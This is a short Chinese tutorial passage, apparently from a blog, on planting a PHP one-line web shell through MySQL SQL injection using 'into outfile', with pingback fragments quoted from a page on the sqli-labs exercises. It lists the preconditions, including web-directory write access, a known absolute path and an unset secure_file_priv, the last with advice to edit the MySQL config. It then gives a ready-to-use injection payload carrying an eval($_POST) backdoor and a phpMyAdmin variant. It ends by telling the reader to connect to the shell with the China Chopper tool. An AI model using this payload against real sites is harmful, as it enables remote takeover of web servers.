利用需要的条件有:
1、对web目录需要有写权限能够使用单引号
2、知道绝对路径
3、没有配置-secure-file-priv(在mysql的配置文件中需要有一句 secure_file_priv='' ,没有的话自行添加或修改)
当知道路径时,可以直接用?id=1 union select "<?php @eval($_POST['123']);?>" into outfile"C:/phpStudy/WWW/a.php"
或者采用PHPmyadmin,选择一个数据库如test,在数据库中新创建一个表aa,在aa中插入一个数据<?php @eval($_POST['123']);?>,然后用select * from aa into outfile 'C:/phpStudy/WWW/a.php'; #将aaa中的数据导出到文件a.php
语句执行成功后利用菜刀进行连接
[…] 2.查询成功时显示“You are in…. Use outfile……”,其中“outfile”是mysql里面的一个向系统写入文件的函数,关于outfile写入一句话木马 […]
[…] 2.查询成功时显示“You are in…. Use outfile……”,其中“outfile”是mysql里面的一个向系统写入文件的函数,关于outfile写入一句话木马 […]
1
1